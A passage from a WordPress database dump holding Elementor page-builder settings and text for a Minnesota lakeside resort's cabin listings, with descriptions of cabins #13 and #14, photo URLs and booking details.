sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"8054fb1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8154e2d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"18fffb4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3b51474\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"fe00457\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Located adjacent to Lake Christina, a premiere duck hunting lake. We are open for duck hunting until the lake freezes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2277,52,'_elementor_edit_mode','builder'),(2278,52,'_elementor_template_type','post'),(2279,52,'_elementor_version','2.6.8'),(2281,52,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\":\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><span style=\\\"text-decoration: underline;\\\">Now booking for next summer !!!<\\/span><\\/h2><h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it 218-747-2959<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2282,802,'_wp_page_template','default'),(2283,802,'_elementor_edit_mode','builder'),(2284,802,'_elementor_template_type','post'),(2285,802,'_elementor_version','2.5.13'),(2286,802,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2287,802,'_elementor_data','[{\"id\":\"28272bf9\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"da0b5cd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6fca821\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"429fbfe\"}]},\"elements\":[{\"id\":\"461a95dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"60c5c78\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"090a4db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ba3ba5a\"}]},\"elements\":[{\"id\":\"16ea4c33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Love to stay in a Newer Cabin - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it<\\/a><\\/h3><h2><strong>#13<\\/strong><\\/h2><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<br \\/><img class=\\\"alignnone size-medium wp-image-115\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSC05132-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-378\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-380\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-386\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-382\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-379\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><\\/p><p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p><p><img class=\\\"alignnone size-medium wp-image-354\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3477-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-380\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-382\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2301,804,'_wp_page_template','default'),(2302,804,'_elementor_edit_mode','builder'),(2303,804,'_elementor_template_type','post'),(2304,804,'_elementor_version','2.5.13'),(2305,804,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2306,804,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\"